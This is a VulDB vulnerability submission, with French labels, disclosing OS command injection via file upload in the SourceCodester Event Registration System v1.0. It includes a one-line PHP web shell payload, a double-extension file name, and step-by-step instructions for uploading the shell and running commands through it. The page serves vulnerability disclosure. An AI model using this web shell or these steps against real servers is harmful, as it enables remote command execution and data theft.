| Titre | OS command injection via File Upload in Event Registration System with QR Code |
|---|
| Description | # Exploit Title: Event Registration System with QR Code
# Exploit Author: Krutika Thakur
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/14884/event-registration-system-qr-code-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/14884/event-registration-system-qr-code-php-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
Description:-
A OS command injection via File Upload issue in Event Registration System with QR Code App v.1.0 allows to inject OS command injection which can leads to all internal files in the system
Payload: shell.png.php
<?php echo "Shell";system($_GET['cmd']); ?>
Steps:
1) Login as ADMIN
2) Now go to http://localhost/event/admin/?page=user/list and add user
3) Now fill the details and upload a malicious file.
Payload: shell.png.php
<?php echo "Shell";system($_GET['cmd']); ?>
4) Now save the user
5) Open the image in new tab and in the above url type the below command
http://localhost/event/uploads/1669472280_shell.png.php?cmd=whoami
6) As we can see the OS command injection has been executed |
|---|
| Utilisateur | lucifoxer001 (UID 33693) |
|---|
| Soumission | 26/11/2022 15:26 (il y a 4 ans) |
|---|
| Modérer | 30/11/2022 11:50 (4 days later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 214590 [SourceCodester Event Registration System 1.0 cmd élévation de privilèges] |
|---|
| Points | 17 |
|---|